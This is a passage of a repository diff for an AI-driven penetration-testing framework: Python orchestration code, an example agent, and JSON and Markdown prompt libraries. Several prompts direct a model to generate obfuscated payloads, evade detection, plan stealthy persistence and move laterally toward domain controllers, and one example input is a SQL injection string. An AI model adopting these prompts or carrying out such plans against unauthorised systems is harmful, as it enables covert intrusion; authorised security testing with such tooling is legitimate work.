        user_prompt_template = self.get_prompt("json_prompts", "vulnerability_testing", user_prompt_name)
        if not user_prompt_template:
            logger.warning(f"No user prompt found for vulnerability type: {vulnerability_type}")
            return {"error": f"No user prompt template for {vulnerability_type}"}

        # Replace the type-specific placeholder in the user prompt template
        if vulnerability_type.lower() == "ssrf":
            prompt = user_prompt_template.format(http_data_json=json.dumps(vulnerability_data, indent=2))
        elif vulnerability_type.lower() == "sql_injection":
            prompt = user_prompt_template.format(input_data_json=json.dumps(vulnerability_data, indent=2))
        elif vulnerability_type.lower() == "xss":
            prompt = user_prompt_template.format(xss_data_json=json.dumps(vulnerability_data, indent=2))
        elif vulnerability_type.lower() == "lfi":
            prompt = user_prompt_template.format(lfi_data_json=json.dumps(vulnerability_data, indent=2))
        elif vulnerability_type.lower() == "broken_object":
            prompt = user_prompt_template.format(api_data_json=json.dumps(vulnerability_data, indent=2))
        elif vulnerability_type.lower() == "broken_auth":
            prompt = user_prompt_template.format(auth_data_json=json.dumps(vulnerability_data, indent=2))
        else:
            logger.warning(f"Unsupported vulnerability type for analysis: {vulnerability_type}")
            return {"error": f"Unsupported vulnerability type: {vulnerability_type}"}

        system_prompt = self.get_prompt("json_prompts", "vulnerability_testing", system_prompt_name)
        if not system_prompt:
            logger.warning(f"No system prompt found for vulnerability type: {vulnerability_type}")
            # Use a generic system prompt if a specific one isn't found
            system_prompt = "You are an expert web security tester. Analyze the provided data for vulnerabilities and offer exploitation steps and remediation."

        response = self.generate(prompt, system_prompt)

        try:
            return json.loads(response)
        except json.JSONDecodeError:
            logger.error(f"Failed to decode JSON response for {vulnerability_type} analysis: {response}")
            return {"raw_response": response}
        except Exception as e:
            logger.error(f"Error during {vulnerability_type} analysis: {e}")
            return {"error": str(e), "raw_response": response}
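End to end, the manager is driven roughly as below; a hedged sketch (the finding and request data are invented, and the default profile expects GEMINI_API_KEY to be set):

# Sketch: instantiate the manager from config.json and run two of its helpers.
import json
from core.llm_manager import LLMManager

with open("config/config.json") as f:
    llm = LLMManager(json.load(f))

# Free-form analysis of a single finding (invented data).
report = llm.analyze_vulnerability({"service": "http", "port": 8080,
                                    "issue": "outdated framework version"})

# Prompt-library driven analysis of a suspected SQL injection (invented data).
sqli = llm.analyze_web_vulnerability("sql_injection", {
    "parameter": "id",
    "payload": "1' OR '1'='1",
    "response_snippet": "You have an error in your SQL syntax"
})
print(json.dumps({"vuln": report, "sqli": sqli}, indent=2))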
0
custom_agents/__init__.py
Normal file
0
custom_agents/__init__.py
Normal file
83
custom_agents/example_agent.py
Normal file
83
custom_agents/example_agent.py
Normal file
@@ -0,0 +1,83 @@
#!/usr/bin/env python3
"""
Example Custom Agent for NeuroSploitv2
This demonstrates how to create custom agents for specific tasks
"""

import logging
from typing import Dict
from core.llm_manager import LLMManager

logger = logging.getLogger(__name__)


class CustomAgent:
    """Example custom agent - Web API Security Scanner"""

    def __init__(self, config: Dict):
        """Initialize custom agent"""
        self.config = config
        self.llm = LLMManager(config)
        self.name = "WebAPIScanner"
        logger.info(f"{self.name} initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute custom agent logic"""
        logger.info(f"Running {self.name} on {target}")

        results = {
            "agent": self.name,
            "target": target,
            "status": "running",
            "findings": []
        }

        try:
            # Your custom logic here
            # Example: API endpoint testing
            results["findings"] = self._scan_api_endpoints(target)

            # Use AI for analysis
            ai_analysis = self._ai_analyze(results["findings"])
            results["ai_analysis"] = ai_analysis

            results["status"] = "completed"

        except Exception as e:
            logger.error(f"Error in {self.name}: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _scan_api_endpoints(self, target: str) -> list:
        """Custom scanning logic"""
        # Implement your custom scanning logic
        return [
            {"endpoint": "/api/users", "method": "GET", "auth": "required"},
            {"endpoint": "/api/admin", "method": "POST", "auth": "weak"}
        ]

    def _ai_analyze(self, findings: list) -> Dict:
        """Use AI to analyze findings"""
        prompt = f"""
Analyze the following API security findings:

{findings}

Provide:
1. Security assessment
2. Risk prioritization
3. Exploitation recommendations
4. Remediation advice

Response in JSON format.
"""

        system_prompt = "You are an API security expert."

        try:
            response = self.llm.generate(prompt, system_prompt)
            return {"analysis": response}
        except Exception as e:
            return {"error": str(e)}
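A minimal sketch of running the example agent on its own (the target URL is a placeholder, not a real endpoint):

# Sketch: run the example custom agent directly against a placeholder target.
import json
from custom_agents.example_agent import CustomAgent

config = json.load(open("config/config.json"))
agent = CustomAgent(config)
results = agent.execute("https://api.target.example", context={})
print(json.dumps(results, indent=2))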
357
neurosploit.py
Normal file
357
neurosploit.py
Normal file
@@ -0,0 +1,357 @@
#!/usr/bin/env python3
"""
NeuroSploitv2 - AI-Powered Penetration Testing Framework
Author: Security Research Team
License: MIT
Version: 2.0.0
"""

import os
import sys
import argparse
import json
from pathlib import Path
from typing import Dict, List, Optional
import logging
from datetime import datetime

# Setup logging (ensure the log directory exists before attaching the file handler)
os.makedirs('logs', exist_ok=True)
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[
        logging.FileHandler('logs/neurosploit.log'),
        logging.StreamHandler(sys.stdout)
    ]
)
logger = logging.getLogger(__name__)

from core.llm_manager import LLMManager
from agents.base_agent import BaseAgent


class NeuroSploitv2:
    """Main framework class for NeuroSploitv2"""

    def __init__(self, config_path: str = "config/config.json"):
        """Initialize the framework"""
        self.config_path = config_path
        self.config = self._load_config()
        # self.agents = {}  # Removed as agents will be dynamically created per role
        self.session_id = datetime.now().strftime("%Y%m%d_%H%M%S")
        self._setup_directories()

        # LLMManager instance will be created dynamically per agent role to select specific profiles
        self.llm_manager_instance: Optional[LLMManager] = None

        logger.info(f"NeuroSploitv2 initialized - Session: {self.session_id}")
    def _setup_directories(self):
        """Create necessary directories"""
        dirs = ['logs', 'reports', 'data', 'custom_agents', 'results']
        for d in dirs:
            Path(d).mkdir(exist_ok=True)

    def _load_config(self) -> Dict:
        """Load configuration from file"""
        if os.path.exists(self.config_path):
            with open(self.config_path, 'r') as f:
                return json.load(f)
        return self._create_default_config()

    def _create_default_config(self) -> Dict:
        """Create default configuration"""
        config = {
            "llm": {
                "provider": "gemini",
                "model": "gemini-pro",
                "api_key": "",
                "temperature": 0.7,
                "max_tokens": 4096
            },
            "agent_roles": {
                "bug_bounty_hunter": {
                    "enabled": True,
                    "llm_profile": "gemini_pro_default",
                    "tools_allowed": ["subfinder", "nuclei", "burpsuite", "sqlmap"],
                    "description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
                },
                "blue_team_agent": {
                    "enabled": True,
                    "llm_profile": "claude_opus_default",
                    "tools_allowed": [],
                    "description": "Analyzes logs and telemetry for threats, provides defensive strategies."
                },
                "exploit_expert": {
                    "enabled": True,
                    "llm_profile": "gpt_4o_default",
                    "tools_allowed": ["metasploit", "nmap"],
                    "description": "Devises exploitation strategies and payloads for identified vulnerabilities."
                },
                "red_team_agent": {
                    "enabled": True,
                    "llm_profile": "gemini_pro_default",
                    "tools_allowed": ["nmap", "metasploit", "hydra"],
                    "description": "Plans and executes simulated attacks to test an organization's defenses."
                },
                "replay_attack_specialist": {
                    "enabled": True,
                    "llm_profile": "ollama_llama3_default",
                    "tools_allowed": ["burpsuite"],
                    "description": "Identifies and leverages replay attack vectors in network traffic or authentication."
                },
                "pentest_generalist": {
                    "enabled": True,
                    "llm_profile": "gemini_pro_default",
                    "tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", "burpsuite", "sqlmap", "hydra"],
                    "description": "Performs comprehensive penetration tests across various domains."
                },
                "owasp_expert": {
                    "enabled": True,
                    "llm_profile": "gemini_pro_default",
                    "tools_allowed": ["burpsuite", "sqlmap"],
                    "description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
                },
                "cwe_expert": {
                    "enabled": True,
                    "llm_profile": "claude_opus_default",
                    "tools_allowed": [],
                    "description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
                },
                "malware_analyst": {
                    "enabled": True,
                    "llm_profile": "gpt_4o_default",
                    "tools_allowed": [],
                    "description": "Examines malware samples to understand functionality and identify IOCs."
                }
            },
            "methodologies": {
                "owasp_top10": True,
                "cwe_top25": True,
                "network_pentest": True,
                "ad_pentest": True,
                "web_security": True
            },
            "tools": {
                "nmap": "/usr/bin/nmap",
                "metasploit": "/usr/bin/msfconsole",
                "burpsuite": "/usr/bin/burpsuite",
                "sqlmap": "/usr/bin/sqlmap",
                "hydra": "/usr/bin/hydra"
            },
            "output": {
                "format": "json",
                "verbose": True,
                "save_artifacts": True
            }
        }

        # Save default config
        os.makedirs(os.path.dirname(self.config_path), exist_ok=True)
        with open(self.config_path, 'w') as f:
            json.dump(config, f, indent=4)

        logger.info(f"Created default configuration at {self.config_path}")
        return config
    def _initialize_llm_manager(self, agent_llm_profile: Optional[str] = None):
        """Initializes LLMManager with a specific profile or default."""
        llm_config = self.config.get('llm', {})
        if agent_llm_profile:
            # Temporarily modify config to set the default profile for LLMManager init
            original_default = llm_config.get('default_profile')
            llm_config['default_profile'] = agent_llm_profile
            self.llm_manager_instance = LLMManager({"llm": llm_config})
            llm_config['default_profile'] = original_default  # Restore original default
        else:
            self.llm_manager_instance = LLMManager({"llm": llm_config})

    def execute_agent_role(self, agent_role_name: str, user_input: str, additional_context: Optional[Dict] = None):
        """Execute a specific agent role with a given input."""
        logger.info(f"Starting execution for agent role: {agent_role_name}")

        agent_roles_config = self.config.get('agent_roles', {})
        role_config = agent_roles_config.get(agent_role_name)

        if not role_config:
            logger.error(f"Agent role '{agent_role_name}' not found in configuration.")
            return {"error": f"Agent role '{agent_role_name}' not found."}

        if not role_config.get('enabled', False):
            logger.warning(f"Agent role '{agent_role_name}' is disabled in configuration.")
            return {"warning": f"Agent role '{agent_role_name}' is disabled."}

        llm_profile_name = role_config.get('llm_profile', self.config['llm']['default_profile'])
        self._initialize_llm_manager(llm_profile_name)

        if not self.llm_manager_instance:
            logger.error("LLM Manager could not be initialized.")
            return {"error": "LLM Manager initialization failed."}

        # Get the prompts for the selected agent role
        # Assuming agent_role_name directly maps to the .md filename
        agent_prompts = self.llm_manager_instance.prompts.get("md_prompts", {}).get(agent_role_name)
        if not agent_prompts:
            logger.error(f"Prompts for agent role '{agent_role_name}' not found in MD library.")
            return {"error": f"Prompts for agent role '{agent_role_name}' not found."}

        # Instantiate and execute the BaseAgent
        agent_instance = BaseAgent(agent_role_name, self.config, self.llm_manager_instance, agent_prompts)

        results = agent_instance.execute(user_input, additional_context)

        # Save results
        campaign_results = {
            "session_id": self.session_id,
            "agent_role": agent_role_name,
            "input": user_input,
            "timestamp": datetime.now().isoformat(),
            "results": results
        }
        self._save_results(campaign_results)
        return campaign_results

    def _save_results(self, results: Dict):
        """Save campaign results"""
        output_file = f"results/campaign_{self.session_id}.json"
        with open(output_file, 'w') as f:
            json.dump(results, f, indent=4)
        logger.info(f"Results saved to {output_file}")

        # Generate report
        self._generate_report(results)

    def _generate_report(self, results: Dict):
        """Generate HTML report for agent role execution"""
        report_file = f"reports/report_{self.session_id}.html"

        html = f"""
<!DOCTYPE html>
<html>
<head>
    <title>NeuroSploitv2 Report - {results['session_id']}</title>
    <style>
        body {{ font-family: Arial, sans-serif; margin: 20px; background: #1e1e1e; color: #fff; }}
        h1 {{ color: #00ff00; }}
        h2 {{ color: #00ccff; border-bottom: 2px solid #00ccff; }}
        .phase {{ background: #2d2d2d; padding: 15px; margin: 10px 0; border-radius: 5px; }}
        .finding {{ background: #3d3d3d; padding: 10px; margin: 5px 0; border-left: 3px solid #ff6600; }}
        .success {{ color: #00ff00; }}
        .warning {{ color: #ffaa00; }}
        .error {{ color: #ff0000; }}
    </style>
</head>
<body>
    <h1>NeuroSploitv2 Agent Role Execution Report</h1>
    <p><strong>Agent Role:</strong> {results.get('agent_role', 'N/A')}</p>
    <p><strong>Input:</strong> {results.get('input', 'N/A')}</p>
    <p><strong>Session:</strong> {results['session_id']}</p>
    <p><strong>Timestamp:</strong> {results['timestamp']}</p>
    <hr>
"""

        html += f"<h2>Agent Results: {results.get('agent_role', 'N/A').replace('_', ' ').title()}</h2>"
        html += f"<div class='phase'><pre>{json.dumps(results.get('results', {}), indent=2)}</pre></div>"

        html += "</body></html>"

        with open(report_file, 'w') as f:
            f.write(html)

        logger.info(f"Report generated: {report_file}")

    def interactive_mode(self):
        """Start interactive mode"""
        print("""
╔═══════════════════════════════════════════════════════════╗
║            NeuroSploitv2 - AI Offensive Security            ║
║                      Interactive Mode                       ║
╚═══════════════════════════════════════════════════════════╝
        """)

        while True:
            try:
                cmd = input("\nNeuroSploit> ").strip()

                if cmd.lower() in ['exit', 'quit']:
                    break
                elif cmd.lower() == 'help':
                    self._show_help()
                elif cmd.startswith('run_agent'):
                    parts = cmd.split(maxsplit=2)  # e.g., run_agent red_team_agent "scan example.com"
                    if len(parts) >= 3:
                        agent_role_name = parts[1]
                        user_input = parts[2].strip('"')
                        self.execute_agent_role(agent_role_name, user_input)
                    else:
                        print("Usage: run_agent <agent_role_name> \"<user_input>\"")
                elif cmd.startswith('config'):
                    print(json.dumps(self.config, indent=2))
                elif cmd.lower() == 'list_roles':
                    print("\nAvailable Agent Roles:")
                    for role_name, role_details in self.config.get('agent_roles', {}).items():
                        status = "Enabled" if role_details.get("enabled") else "Disabled"
                        print(f"  - {role_name} ({status}): {role_details.get('description', 'No description.')}")
                        print(f"    LLM Profile: {role_details.get('llm_profile', 'default')}")
                        print(f"    Tools Allowed: {', '.join(role_details.get('tools_allowed', [])) or 'None'}")
                else:
                    print("Unknown command. Type 'help' for available commands.")
            except KeyboardInterrupt:
                print("\nExiting...")
                break
            except Exception as e:
                logger.error(f"Error: {e}")

    def _show_help(self):
        """Show help menu"""
        print("""
Available Commands:
  run_agent <role> "<input>"  - Execute a specific agent role (e.g., run_agent red_team_agent "scan target.com")
  list_roles                  - List all configured agent roles and their details
  config                      - Show current configuration
  help                        - Show this help menu
  exit/quit                   - Exit the framework
        """)


def main():
    """Main entry point"""
    parser = argparse.ArgumentParser(
        description='NeuroSploitv2 - AI-Powered Penetration Testing Framework',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python neurosploit.py --agent-role red_team_agent --input "Scan example.com for vulnerabilities"
  python neurosploit.py -i
        """
    )

    parser.add_argument('-r', '--agent-role', help='Name of the agent role to execute')
    parser.add_argument('-i', '--interactive', action='store_true',
                        help='Start in interactive mode')
    parser.add_argument('--input', help='Input prompt/task for the agent role')
    parser.add_argument('-c', '--config', default='config/config.json',
                        help='Configuration file path')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='Enable verbose output')

    args = parser.parse_args()

    if args.verbose:
        logging.getLogger().setLevel(logging.DEBUG)

    # Initialize framework
    framework = NeuroSploitv2(config_path=args.config)

    if args.interactive:
        framework.interactive_mode()
    elif args.agent_role and args.input:
        framework.execute_agent_role(args.agent_role, args.input)
    else:
        parser.print_help()
        print("\n[!] Please specify an agent role and input or use interactive mode (-i)")


if __name__ == "__main__":
    main()
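Besides the CLI shown in the epilog, the framework can be driven programmatically; a hedged sketch (the role, task string, and context are examples, and the role's Markdown prompt file must exist under prompts/md_library/):

# Sketch: programmatic use of the framework instead of the CLI.
from neurosploit import NeuroSploitv2

framework = NeuroSploitv2(config_path="config/config.json")
campaign = framework.execute_agent_role(
    "blue_team_agent",
    "Review the attached auth logs for brute-force activity",
    additional_context={"log_source": "auth.log"}
)
print(campaign.get("results"))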
52
prompts/library.json
Normal file
52
prompts/library.json
Normal file
@@ -0,0 +1,52 @@
|
|||||||
|
{
|
||||||
|
"network_recon": {
|
||||||
|
"network_scan": "Analyze network scan results and identify attack vectors",
|
||||||
|
"osint": "Perform OSINT analysis on target organization",
|
||||||
|
"ai_analysis_user": "Analyze the following network reconnaissance data and provide insights:\n\n{recon_data_json}\n\nProvide:\n1. Attack surface summary\n2. Prioritized network target list\n3. Identified network vulnerabilities or misconfigurations\n4. Recommended next steps for network exploitation\n5. Network risk assessment\n6. Stealth considerations for network activities\n\nResponse in JSON format with actionable recommendations.",
|
||||||
|
"ai_analysis_system": "You are an expert network penetration tester analyzing reconnaissance data.\nIdentify network security weaknesses, network attack vectors, and provide strategic recommendations.\nConsider both technical and operational security aspects."
|
||||||
|
},
|
||||||
|
"web_recon": {
|
||||||
|
"web_enum": "Enumerate web application for vulnerabilities",
|
||||||
|
"ai_analysis_user": "Analyze the following potential web vulnerabilities identified on {target} and provide insights:\n\nVulnerabilities: {vulnerabilities_json}\n\nProvide:\n1. Prioritized list of vulnerabilities\n2. Recommended exploitation steps for each (if applicable)\n3. Potential impact\n4. Remediation suggestions\n\nResponse in JSON format with actionable recommendations.",
|
||||||
|
"ai_analysis_system": "You are an expert web penetration tester and security analyst.\nProvide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."
|
||||||
|
},
|
||||||
|
"exploitation": {
|
||||||
|
"ai_exploit_planning_user": "Plan an exploitation strategy based on the following data:\n\nVulnerabilities Identified:\n{vulnerabilities_json}\n\nReconnaissance Data:\n{recon_data_json}\n\nProvide:\n1. Prioritized exploitation order\n2. Recommended exploits for each vulnerability\n3. Payload suggestions\n4. Evasion techniques\n5. Fallback strategies\n6. Success probability estimates\n\nResponse in JSON format with detailed exploitation roadmap.",
|
||||||
|
"ai_exploit_planning_system": "You are an expert exploit developer and penetration tester.\nCreate sophisticated exploitation plans considering detection, success rates, and impact.\nPrioritize stealthy, reliable exploits over noisy attempts.",
|
||||||
|
"analyze_vulnerability_user": "Analyze the following vulnerability data and provide exploitation recommendations:\n\nVulnerability: {vulnerability_data_json}\n\nProvide:\n1. Severity assessment (Critical/High/Medium/Low)\n2. Exploitation difficulty\n3. Potential impact\n4. Recommended exploit techniques\n5. Detection evasion strategies\n6. Post-exploitation actions\n\nResponse in JSON format.",
|
||||||
|
"analyze_vulnerability_system": "You are an expert penetration tester and security researcher.\nAnalyze vulnerabilities and provide detailed, actionable exploitation strategies.\nConsider OWASP, CWE, and MITRE ATT&CK frameworks.\nAlways include ethical considerations and legal boundaries.",
|
||||||
|
"generate_payload_user": "Generate an exploit payload for the following scenario:\n\nTarget Information:\n{target_info_json}\n\nVulnerability Type: {vulnerability_type}\n\nRequirements:\n1. Generate a working payload\n2. Include obfuscation techniques\n3. Add error handling\n4. Ensure minimal detection footprint\n5. Include cleanup procedures\n\nProvide the payload code with detailed comments.",
|
||||||
|
"generate_payload_system": "You are an expert exploit developer.\nGenerate sophisticated, tested payloads that are effective yet responsible.\nAlways include safety mechanisms and ethical guidelines."
|
||||||
|
},
|
||||||
|
"privesc": {
|
||||||
|
"suggest_privilege_escalation_user": "Based on the following system information, suggest privilege escalation techniques:\n\nSystem Info:\n{system_info_json}\n\nProvide:\n1. Top 5 privilege escalation vectors\n2. Required tools and commands\n3. Detection likelihood\n4. Success probability\n5. Alternative approaches\n\nResponse in JSON format with prioritized list.",
|
||||||
|
"suggest_privilege_escalation_system": "You are a privilege escalation specialist.\nAnalyze system configurations and suggest effective escalation paths.\nConsider Windows, Linux, and Active Directory environments."
|
||||||
|
},
|
||||||
|
"persistence": {
|
||||||
|
"ai_persistence_strategy_user": "Plan a comprehensive persistence strategy based on the following context:\n\n{context_json}\n\nProvide:\n1. Recommended persistence techniques (prioritized)\n2. Stealth considerations\n3. Resilience against system reboots\n4. Evasion of detection mechanisms\n5. Multiple fallback mechanisms\n6. Cleanup and removal procedures\n\nResponse in JSON format with detailed implementation plan.",
|
||||||
|
"ai_persistence_strategy_system": "You are an expert in persistence techniques and advanced persistent threats.\nDesign robust, stealthy persistence mechanisms that survive reboots and detection attempts.\nConsider both Windows and Linux environments.\nPrioritize operational security and longevity."
|
||||||
|
},
|
||||||
|
"lateral_movement": {
|
||||||
|
"ai_movement_strategy_user": "Plan a lateral movement strategy based on the following:\n\nCurrent Context:\n{context_json}\n\nDiscovered Hosts:\n{hosts_json}\n\nProvide:\n1. Target prioritization (high-value targets first)\n2. Movement techniques for each target\n3. Credential strategies\n4. Evasion techniques\n5. Attack path optimization\n6. Fallback options\n\nResponse in JSON format with detailed attack paths.",
|
||||||
|
"ai_movement_strategy_system": "You are an expert in lateral movement and Active Directory attacks.\nPlan sophisticated movement strategies that minimize detection and maximize impact.\nConsider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.\nPrioritize domain controllers and critical infrastructure."
|
||||||
|
},
|
||||||
|
"vulnerability_testing": {
|
||||||
|
"ssrf_user": "Analyze the following HTTP request/response data for potential Server-Side Request Forgery (SSRF) vulnerabilities:\n\n{http_data_json}\n\nProvide:\n1. Confirmation of SSRF vulnerability\n2. Potential impact\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"ssrf_system": "You are an expert web vulnerability tester, specializing in SSRF.\nAnalyze provided HTTP data to confirm and detail SSRF vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"sql_injection_user": "Analyze the following input field data and database responses for potential SQL Injection vulnerabilities:\n\n{input_data_json}\n\nProvide:\n1. Confirmation of SQL Injection vulnerability (including type: boolean-based, error-based, time-based, UNION-based)\n2. Potential impact (data exfiltration, authentication bypass)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"sql_injection_system": "You are an expert web vulnerability tester, specializing in SQL Injection (all types).\nAnalyze provided data to confirm and detail SQL Injection vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"xss_user": "Analyze the following input fields, reflected outputs, and DOM for potential Cross-Site Scripting (XSS) vulnerabilities:\n\n{xss_data_json}\n\nProvide:\n1. Confirmation of XSS vulnerability (including type: Reflected, Stored, DOM-based)\n2. Potential impact (session hijacking, defacement, malware delivery)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"xss_system": "You are an expert web vulnerability tester, specializing in XSS (Reflected, Stored, DOM-based).\nAnalyze provided data to confirm and detail XSS vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"lfi_user": "Analyze the following file path inputs and server responses for potential Local File Inclusion (LFI) vulnerabilities:\n\n{lfi_data_json}\n\nProvide:\n1. Confirmation of LFI vulnerability\n2. Potential impact (information disclosure, remote code execution via log poisoning)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"lfi_system": "You are an expert web vulnerability tester, specializing in Local File Inclusion (LFI).\nAnalyze provided data to confirm and detail LFI vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"broken_object_user": "Analyze the following API endpoint behavior and object IDs for potential Broken Object Level Authorization (BOLA) vulnerabilities:\n\n{api_data_json}\n\nProvide:\n1. Confirmation of BOLA vulnerability\n2. Potential impact (unauthorized access to sensitive data/actions)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"broken_object_system": "You are an expert API security tester, specializing in Broken Object Level Authorization (BOLA).\nAnalyze provided API data to confirm and detail BOLA vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"broken_auth_user": "Analyze the following authentication mechanisms (login, session management, password reset) for potential Broken Authentication vulnerabilities:\n\n{auth_data_json}\n\nProvide:\n1. Confirmation of Broken Authentication vulnerability (e.g., weak password policy, session fixation, credential stuffing, improper logout)\n2. Potential impact (account takeover, unauthorized access)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"broken_auth_system": "You are an expert web security tester, specializing in Broken Authentication vulnerabilities (e.g., session management, password policies, credential handling).\nAnalyze provided data to confirm and detail Broken Authentication vulnerabilities, their impact, and exploitation."
|
||||||
|
}
|
||||||
|
}
|
||||||
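The entries above are plain Python format strings keyed by agent task; placeholders such as {system_info_json} and {context_json} are filled with JSON-serialized context at call time. A minimal sketch of rendering one of them, assuming the library is saved as prompts/prompts.json (the path and the surrounding loading code are assumptions, not taken from the repo):

import json

# Hypothetical example: render the privesc user prompt with live system data.
with open("prompts/prompts.json") as f:  # assumed location of the JSON above
    prompts = json.load(f)

template = prompts["privesc"]["suggest_privilege_escalation_user"]
system_info = {"os": "linux", "kernel": "5.15.0", "user": "www-data"}  # illustrative

rendered = template.format(system_info_json=json.dumps(system_info, indent=2))
print(rendered)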
20
prompts/md_library/blue_team_agent.md
Normal file
@@ -0,0 +1,20 @@
# Blue Team Agent Prompt

## User Prompt
As a Blue Team Agent, analyze the provided security logs, alerts, and system telemetry to detect and respond to potential threats. Focus on identifying indicators of compromise (IOCs) and anomalous behavior.

**Security Logs/Alerts:**
{logs_alerts_json}

**System Telemetry:**
{telemetry_json}

**Instructions:**
1. Identify any active or past compromise attempts.
2. Detail identified IOCs (IPs, hashes, domains, etc.).
3. Suggest immediate containment and eradication steps.
4. Provide recommendations for forensic analysis.
5. Classify the severity and potential impact.

## System Prompt
You are an experienced Blue Team security analyst, skilled in threat detection, incident response, and forensic analysis. Your goal is to protect systems, identify threats, and provide actionable intelligence for defense. Emphasize detection techniques, mitigation strategies, and system hardening.
20
prompts/md_library/bug_bounty_hunter.md
Normal file
@@ -0,0 +1,20 @@
# Bug Bounty Hunter Prompt

## User Prompt
As a Bug Bounty Hunter, analyze the provided target information and reconnaissance data to identify potential vulnerabilities. Focus on high-impact findings and provide clear reproduction steps.

**Target Information:**
{target_info_json}

**Reconnaissance Data:**
{recon_data_json}

**Instructions:**
1. Identify and prioritize potential vulnerabilities (OWASP Top 10, business logic flaws, etc.).
2. For each vulnerability, provide a brief description and potential impact.
3. Detail clear, step-by-step reproduction instructions.
4. Suggest potential fixes or mitigations.
5. Classify the severity (Critical, High, Medium, Low).

## System Prompt
You are an expert Bug Bounty Hunter with extensive experience in finding critical vulnerabilities in web applications and APIs. Your responses should be concise, technically accurate, and focused on actionable findings. Always consider the perspective of a real-world attacker while maintaining ethical guidelines.
16
prompts/md_library/cwe.md.
Normal file
@@ -0,0 +1,16 @@
# CWE Top 25 Prompt

## User Prompt
Analyze the provided code snippets or vulnerability reports against the MITRE CWE Top 25 Most Dangerous Software Errors. Identify occurrences of these common weaknesses and suggest secure coding practices.

**Code Snippets/Vulnerability Reports:**
{code_vulnerability_json}

**Instructions:**
1. Identify any weaknesses present that fall under the CWE Top 25.
2. For each identified CWE, explain its presence and potential impact.
3. Provide examples of secure coding practices to prevent or mitigate the CWE.
4. Suggest testing methodologies to detect these weaknesses.

## System Prompt
You are a secure coding expert and software architect with a profound understanding of the MITRE CWE Top 25. Your role is to identify critical software weaknesses, explain their implications, and guide developers towards robust, secure coding solutions. Focus on code-level analysis and preventative measures.
20
prompts/md_library/exploit_expert.md
Normal file
@@ -0,0 +1,20 @@
# Exploit Expert Prompt

## User Prompt
As an Exploit Expert, analyze the provided vulnerability details and target specifics to devise a working exploitation strategy and payload. Focus on reliability, stealth, and impact.

**Vulnerability Details:**
{vulnerability_details_json}

**Target Information:**
{target_info_json}

**Instructions:**
1. Describe the vulnerability and its potential impact.
2. Propose a detailed exploitation method.
3. Generate a suitable exploit payload (if applicable).
4. Suggest post-exploitation steps.
5. Consider evasion techniques and stealth.

## System Prompt
You are a world-class Exploit Expert, capable of understanding complex vulnerabilities and crafting effective, reliable, and stealthy exploits. Your expertise covers various platforms and architectures. Always prioritize responsible disclosure and ethical considerations.
17
prompts/md_library/malware_analysis.md
Normal file
@@ -0,0 +1,17 @@
# Malware Analysis Prompt

## User Prompt
As a Malware Analyst, examine the provided malware sample details (static and dynamic analysis reports) to understand its functionality, indicators of compromise (IOCs), and potential impact.

**Malware Sample Details:**
{malware_sample_json}

**Instructions:**
1. Describe the malware's primary functionality (e.g., ransomware, keylogger, backdoor).
2. Identify key IOCs (file hashes, C2 servers, registry modifications, network patterns).
3. Assess the potential impact on infected systems.
4. Suggest detection and remediation strategies.
5. Propose a threat intelligence summary.

## System Prompt
You are a highly skilled Malware Analyst specializing in reverse engineering, behavioral analysis, and threat intelligence. Your objective is to provide a detailed technical understanding of malware, its operational characteristics, and actionable intelligence for defense and attribution. Focus on technical details and defensive measures.
19
prompts/md_library/owasp.md
Normal file
@@ -0,0 +1,19 @@
# OWASP Top 10 Prompt

## User Prompt
Analyze the provided web application details and vulnerability scan results against the OWASP Top 10 categories. Identify how the findings map to these categories and provide recommendations.

**Web Application Details:**
{web_app_details_json}

**Vulnerability Scan Results:**
{scan_results_json}

**Instructions:**
1. Map identified vulnerabilities to the relevant OWASP Top 10 categories (e.g., Injection, Broken Authentication, XSS).
2. For each mapped vulnerability, describe its presence in the application.
3. Assess the risk associated with each OWASP Top 10 category.
4. Provide specific remediation advice for each category based on the findings.

## System Prompt
You are a web security expert with deep knowledge of the OWASP Top 10. Your analysis should clearly link observed vulnerabilities to these critical categories and offer practical, industry-standard mitigation strategies. Emphasize impact and prevention.
20
prompts/md_library/pentest.md
Normal file
@@ -0,0 +1,20 @@
# Penetration Test Prompt

## User Prompt
As a Penetration Tester, perform a comprehensive security assessment based on the provided scope and initial information. Identify vulnerabilities, assess risks, and provide actionable recommendations.

**Scope of Work:**
{scope_json}

**Initial Information:**
{initial_info_json}

**Instructions:**
1. Outline a detailed penetration testing plan (reconnaissance, scanning, enumeration, exploitation, post-exploitation).
2. Identify potential attack vectors.
3. Suggest tools and techniques for each phase.
4. Provide a risk assessment for identified vulnerabilities.
5. Formulate remediation strategies.

## System Prompt
You are a highly skilled and ethical Penetration Tester. Your goal is to systematically identify security weaknesses, assess their exploitability, and provide clear, practical advice to improve the security posture of the target system. Adhere strictly to the defined scope and ethical guidelines.
21
prompts/md_library/red_team_agent.md
Normal file
@@ -0,0 +1,21 @@
# Red Team Agent Prompt

## User Prompt
